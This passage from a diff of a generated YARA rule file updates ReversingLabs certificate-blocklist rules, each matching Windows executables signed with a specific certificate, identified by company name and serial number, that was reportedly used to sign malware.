 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "500c9604-cc07-52b1-8c46-09894d132205"
+		id = "1bbaebe9-b3ca-5ee2-91ac-b2343ca8bb86"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12140-L12156"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6140-L6158"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "47735267e9a0fb8107f6c4008bacc8aada1705f6714a0447dacc3928fc20cad6"
+		logic_hash = "cea0d217206562c0045843405802d3b2fad01bdb2a4cfb52057625b43f5f8eee"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23309,21 +45703,21 @@ rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StackUp ApS" and pe.signatures [ i ] . serial == "04:00:c7:61:4f:86:d7:5f:e4:ee:3f:61:92:b6:fe:da" and 1626393601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incar LLC" and ( pe.signatures [ i ] . serial == "00:be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" or pe.signatures [ i ] . serial == "be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" ) and 1602530730 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2e799dd9-d143-55a7-9d07-d5f289477b24"
+		id = "1eed6f30-0648-5b8e-81ff-9f3af0f1c91d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12158-L12176"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6160-L6178"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "425126b90fe2ab7c1ec7bf2fd5a91e4438a81992f20f99ed87ec62e7f20043cd"
+		logic_hash = "9e23ff26d3e1ea181e48fc23383e3717804858bc517a31ec508fa0753730c78e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23333,21 +45727,21 @@ rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERONIKA 2\" OOO" and ( pe.signatures [ i ] . serial == "00:e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" or pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" ) and 1563148800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and ( pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" or pe.signatures [ i ] . serial == "f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" ) and 1602542033 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4b27c958-58f1-5fbd-8a39-aedfe4dafe39"
+		id = "7f7ecbcd-7a92-526d-99a8-d849fffa19cb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12178-L12196"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6180-L6196"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2c47166f02c7f94bb4f82296e3220ff7ca3c6c53566d855b2fe77cb842a5fb43"
+		logic_hash = "7030c122905105c72833cfcb41692bd9a67cf456e3309afce0b8f9e65c6aa5c1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23357,21 +45751,21 @@ rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAS Avto, d.o.o." and ( pe.signatures [ i ] . serial == "00:b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" or pe.signatures [ i ] . serial == "b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" ) and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" and 1603036100 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a93b0a98-cfec-5e32-9fd8-b3d6c4353558"
+		id = "5b2876a2-8dfa-5456-a615-4ea69df53422"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12198-L12216"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6198-L6214"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fc840c0b37867c3b0aa80d4dc609feaaab77d3f0c6f84c8bb2ea7c5a6461ebb8"
+		logic_hash = "f84568cfe6304af0307a34bfed6dd346a74e714005b5e6f22a354b14f853ec65"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23381,21 +45775,21 @@ rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and ( pe.signatures [ i ] . serial == "00:e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" or pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" ) and 1647302400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" and 1599181200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "df6e1403-c300-5d97-b57d-dc70d61b2229"
+		id = "088f0f98-328b-50fa-b1e4-1d80023b3c09"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12218-L12234"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6216-L6234"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "67a975f2806825bf0da27fcaf33c2ff497fe9bb2af12c22ff505b49070516960"
+		logic_hash = "b7ed87a03f20872669369cc3cad4eae40ba597f06222194bd67262c094083ec1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23405,21 +45799,21 @@ rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" and 1621900800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and ( pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" or pe.signatures [ i ] . serial == "d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" ) and 1601895290 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "73f4d6e2-6924-59fa-8ec1-305f2d5dc5a3"
+		id = "ccb4da10-3178-5d8f-be17-9c689e794418"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12236-L12254"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6236-L6252"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "302e2d6b31ca5c2c33c4ec7294630fd88a9c40f70ddecdc606ccff27b24e1cd4"
+		logic_hash = "feeb1710bd5b048c689a2e45575529624cd1622dcc73db8fe7de6c133fdc5698"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23429,21 +45823,21 @@ rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x83\\xB4\\xE5\\xB7\\x9E\\xE8\\x9C\\x97\\xE7\\x89\\x9B\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" or pe.signatures [ i ] . serial == "af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" ) and 1629676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" and 1599181200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1841bbd1-4c7a-5b89-8c63-58d8a3ae1cef"
+		id = "ce437144-0f99-5c41-8d15-edeceb34de4d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12256-L12272"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6254-L6270"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1795812d4daa458b157280cac7a9b13e9b67a2d78eac077691bbce2bf8aeec34"
+		logic_hash = "1cbdf39a873c83d2b55723215fb4930a3ce23b6cab2d71a6cd5f16b2721e30f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23453,21 +45847,21 @@ rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" and 1613088000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" and 1600650000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fd19ce61-056b-549a-946e-72543ff1f7c0"
+		id = "daae5f42-59ff-5838-9444-93357eaa9d60"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12274-L12292"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6272-L6288"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "eb5288d2b96ff7a7783c2b2b02f9f1168784352ed84ad6463dce00c12daca6cb"
+		logic_hash = "17996dd0ec81623dbd4eeea98f9bbe37c11c911ca840833ecb9301bb0a9ddb52"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23477,21 +45871,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANKADA GROUP, d.o.o." and ( pe.signatures [ i ] . serial == "00:bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" or pe.signatures [ i ] . serial == "bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" ) and 1616630400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" and 1601254800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6e8ffb39-d00d-54ca-a4be-68f6dd92d798"
+		id = "f91ecc17-7406-552a-8864-c9e1657a5ca9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12294-L12310"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6290-L6308"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "12235e324b92b83e9cfaed7cbcff5d093b8b1d7528dd5ac327159cde6e9a4d1f"
+		logic_hash = "cffc234be78446191dd5f5990db9f17c7e28eeaa3e16f1eb8ad4ed1e58fdc25e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23501,21 +45895,21 @@ rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" and 1594252800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and ( pe.signatures [ i ] . serial == "00:6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" or pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" ) and 1600176940 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f6d0808d-4748-5b9f-9be2-7753292a6209"
+		id = "c0796bc3-96cd-5d12-a0ee-97d8ed4a3076"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12312-L12328"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6310-L6326"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "978f05f86734c63afe1e5929a58f3cfff75ef749ffda07252db90b6fe12508ec"
+		logic_hash = "40c80d3b6bedb0b3454e14501745a6e82b6ea9ac202748867a2e937fb79c6f6c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23525,21 +45919,21 @@ rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "25:c6:db:ce:3d:54:99:f6:5d:9d:f1:6e:90:07:46:5d" and 1626566400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" and 1601427600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac5ac6d7-898b-5547-8d35-a483f20edcd6"
+		id = "0e7e235e-3f0b-5396-9c19-9336d9cbb95a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12330-L12348"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6328-L6346"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9b678e9fb1e1eda3ac8e027b5e449af446de4379fea46ef7ff820240c73795ee"
+		logic_hash = "a8d2a92b44cdd7b123907a6a77ba0fc9fde4961f9ac846b36f1e87730a1efae6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23549,21 +45943,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" or pe.signatures [ i ] . serial == "bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" ) and 1623801600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and ( pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" or pe.signatures [ i ] . serial == "b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" ) and 1574914319 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6b6958c0-3b43-5c17-9354-d0e2326b97fd"
+		id = "2587d30d-e9c8-599c-9cc4-4d4a7aa83c34"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12350-L12368"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6348-L6366"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1cf0b6855269a771447a0b38f4a02996b6527d7df4b143b69598ed591719ca0"
+		logic_hash = "1255cef74082c9cad41ac8e7d62e740f69e6ba44171bb45655a68ee5db204e57"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23573,21 +45967,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" or pe.signatures [ i ] . serial == "bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" ) and 1628553600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and ( pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" or pe.signatures [ i ] . serial == "b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" ) and 1603328400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7619c39-33a0-5f99-b911-9d8a61a4683d"
+		id = "3e451a5a-835b-572d-ab17-ff52d3614a86"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12370-L12386"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6368-L6386"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a61bcc4a90a75a429366e3f93929005b67325eccc6cad3df6b7a0c3692597828"
+		logic_hash = "f560e6f4a65eaac8db1d8accb0748de17048e66ccf989468e6350a3ec1d70dc8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23597,21 +45991,21 @@ rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" and 1679061408 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and ( pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" or pe.signatures [ i ] . serial == "ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" ) and 1603369254 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
